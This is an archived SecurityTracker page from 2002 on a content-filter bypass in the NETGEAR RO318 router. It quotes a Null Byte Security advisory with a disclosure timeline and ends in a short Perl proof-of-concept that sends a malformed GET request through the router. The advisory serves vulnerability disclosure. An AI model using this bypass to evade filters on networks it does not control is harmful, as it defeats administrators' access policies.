SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Device (Router/Bridge/Hub)  >   NETGEAR Router Vendors:   NETGEAR
NETGEAR Router Web Content Filtering Mechanism Can Be Bypassed By Remote Users With Certain Malformed HTTP GET Requests
SecurityTracker Alert ID:  1003411
SecurityTracker URL:  http://securitytracker.com/id/1003411
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 31 2002
Impact:   Host/resource access via network
Exploit Included:  Yes  
Version(s): RO318
Description:   A vulnerability was reported in NETGEAR's RO318 Cable/DSL Security Router. A remote user can bypass the web content filtering restrictions.

It is reported that a remote user can send a malformed URL request through the router to access restricted web site URLs. The web filtering component in firmware reportedly only checks for fully constructed requests.

Impact:   A remote user can access restricted web content.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.netgear.com/product_view.asp?xrp=4&yrp=12&zrp=96 (Links to External Site)
Cause:   Input validation error

Message History:   None.


 Source Message Contents

Subject:  NetGear RO318 HTTP Filter Advisory


This is a multi-part message in MIME format.
--------------6069F46AB530F429AB1AF289
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

http://home.tampabay.rr.com/nbs/advisories/netgear/netgear.txt
--------------6069F46AB530F429AB1AF289
Content-Type: text/plain; charset=us-ascii;
 name="netgear.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="netgear.txt"

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ NetGear RO318 HTTP Filter Advisory                                             =+
=+ Null Byte Security                                                             =+
=+ http://home.tampabay.rr.com/nbs/                                               =+
=+ don't call it a come back                                                      =+
=+ nbs@tampabay.rr.com                                                            =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ Contents Table                                                                 =+
=+                                                                                =+
=+ 1.About                                                                        =+
=+ 2.Affected                                                                     =+
=+ 3.Details                                                                      =+
=+ 4.Contact                                                                      =+
=+ 5.Conclusion                                                                   =+
=+ 6.Thanks                                                                       =+
=+ 7.Greets                                                                       =+
=+ 8.POC                                                                          =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 1.About                                                                        =+
=+                                                                                =+
=+ NETGEAR's sturdy metal RO318 Cable/DSL Security Router with 8-port switch      =+
=+ fully protects your small office network against intrusion. Equipped with      =+
=+ Stateful Packet Inspection to prevent Denial of Service (DoS) attacks, and     =+
=+ Network Address Translation (NAT) to maintain network security against         =+
=+ hackers, it ensures prolonged up time and maximized productivity for your      =+
=+ network. Web content filtering options let network administrators establish    =+
=+ restricted access policies - based on the time of day, day of week, Web        =+
=+ address keyword - and receive regular reports and instant alerts via e-mail on =+
=+ hacker attempts and browsing activities. Web-based installation instructions   =+
=+ make setup easy. Your network up and running, and sharing high-speed Internet  =+
=+ access with up to 253 users, in less than an hour.                             =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 2.Affected                                                                     =+
=+                                                                                =+
=+ NetGear RO318 Cable/DSL Security Router                                        =+
=+                                                                                =+
=+ Although the NetGear RO318 is the only router listed here we are sure there    =+
=+ other routers that use the RO318's web filtering technology.                   =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 3.Details                                                                      =+
=+                                                                                =+
=+ We are not too sure of the details ourselves because of time restraints, but   =+
=+ we do have an idea. One, the web filtering component in the firmware only      =+
=+ checks for fully constructed requests and thus sending a malformed, somewhat,  =+
=+ request results in the retrieval of restricted content.                        =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 4.Contact                                                                      =+
=+                                                                                =+
=+ December 2 2001: Contacted NetGear                                             =+
=+ December 2 2001: Contacted online support                                      =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460001)       =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460003)       =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460006)       =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460008)       =+
=+ December 8 2001: Five working days passed                                      =+
=+ December 20 2001: Eighteen days passed                                         =+
=+ December 20 2001: Advisory released on home.tampabay.rr.com/nbs/               =+
=+ December 26 2001: POC released                                                 =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 5.Conclusion                                                                   =+
=+                                                                                =+
=+ This is definitely a security vulnerability and not a feature. We hope Net     =+
=+ Gear will fix this with their next firmware release so administrators can      =+
=+ restrict necessary web-content without having to worry about this bug.         =+
=+                                                                                =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 6.Thanks                                                                       =+
=+                                                                                =+
=+ Bi0cide for the help                                                           =+
=+ Datagram for the help                                                          =+
=+ Natas for the help                                                             =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 7.Greets                                                                       =+
=+                                                                                =+
=+ Bi0cide, Natas, Datagram, Z, Medium, BrainStorm, Qitest1, Skerbi, RootX11,     =+
=+ Doug, Bios Disk, Decypher, Notten, RFP, Johnny (johnny.ihackstuff.com), RFP,   =+
=+ Mixter, Pimpshiz, Doxavg, Todd, Sekurity Inc (www.sekurity.net), Packet Storm, =+
=+ Security Focus, and everyone else.                                             =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 8.POC                                                                          =+
=+                                                                                =+
#!/usr/bin/perl
#don't call it a come back
#nbs@tampabay.rr.com

use IO::Socket;
use Getopt::Std;

getopts('h:p:z', \%argv);

if(!defined($argv{h}))
{
    print"NetGear RO318 Web Filter Bypass Exploit by Null Byte Security   \n";

    print"Usage: $0 -h <host> -p <port>                                   \n";
    exit;
}

if(defined($argv{h}))
{
    &begin
}

sub begin
{
    $html   = html;
    $host   = $argv{h};
    if(defined $argv{p})
    {
        $port=$argv{p};
    }
    else
    {
        $port = "80";
    }

    $socket = IO::Socket::INET->new (Proto => "tcp",
                                  PeerAddr => $host,
                                  PeerPort => "$port")
                                  or die "Connection Refused.\n";

    print $socket "GET / HTTP/1.0\n\n";
    while (<$socket>)
    {
        open(LOG, ">>$html");
        print (LOG);
    }
    close $socket;
}
=+                                                                                =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ http://www.wiretrip.net/rfp/policy.html                                        =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

--------------6069F46AB530F429AB1AF289--



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC